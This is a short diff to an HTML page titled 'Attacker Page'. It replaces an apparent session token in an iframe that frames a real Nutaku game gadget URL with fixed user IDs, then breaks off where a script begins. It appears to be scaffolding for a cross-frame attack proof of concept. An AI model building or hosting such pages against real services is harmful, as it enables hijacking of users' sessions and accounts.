--- a/63826187321312836671273721.html
+++ b/63826187321312836671273721.html
@@ -7,7 +7,7 @@
 <body>
   <h2>Attacker Page</h2>
 
-  <iframe id="victim" src="https://osapi.nutaku.com/gadgets/ifr?synd=nutaku&container=nutaku&country=US&lang=en&mid=1&owner=173250875&viewer=173250875&aid=267592&tid=demon-lords-career-change-x&view=canvas&parent=https%3A%2F%2Fwww.nutaku.net&noinfo=0&nocache=0&debug=1&view-params=&st=wy1woKf6B%2FrUogwXfW0f8LdbhUyAYa%2BNpFvFRaAWYhGm9J%2BL7A0BdP6B8giD777j6u%2Bgq%2BusHLpjDpk5QTG70Litjdj5MukgtYF8i9TH7DpGGftbiLduwgN0b%2FqP3K9w24gmAqy9tp23CYt9xzDqWLROsSd2atMK9V2FSBg%2BAvBW2ygVh1KnOT0cGSHAvbG2eDn%2FUiumkXn%2BF9wTmVvtr55mKZIcsZycYIyDb3OpMPQG8SOGQ%2FxTydpJtRwU5oom0PMjiknnlAInyUTZ5SEH1wQAC%2B8%3D&domain=https%3A%2F%2Fwww.nutaku.net"></iframe>
+  <iframe id="victim" src="https://osapi.nutaku.com/gadgets/ifr?synd=nutaku&container=nutaku&country=US&lang=en&mid=1&owner=173250875&viewer=173250875&aid=267592&tid=demon-lords-career-change-x&view=canvas&parent=https%3A%2F%2Fwww.nutaku.net&noinfo=0&nocache=0&debug=1&view-params=&st=MFbYZl4LFU1uQO%2FH%2BgccKFlsU4rZ9%2BtyIzTpTTAPB%2Fuj8DY%2FbLt2HHVw9LiRRX2saqIIBD3rBJ%2FKFjzhJBx%2FdPO9YdN9aaAYhlwEky5NTYvb8%2BMeBOqm7ZzmWggna8lNYqooyV8pfuitfKR%2FFkkNEsSFXnTR1NH7w3KZ4mpQYeyi77B6dq8GwddyjHdajPhpf8bx42zLy8TMBe2q%2B5Z2UM5ryQXDD9SXU9P5blFjB2Cwy1S0YaXYHo91RHokDsDBX65C13gkQNgSVFYHKMkS1y5PduU%3D&domain=https%3A%2F%2Fwww.nutaku.net"></iframe>
 
   <script>
     // Wait until the iframe loads
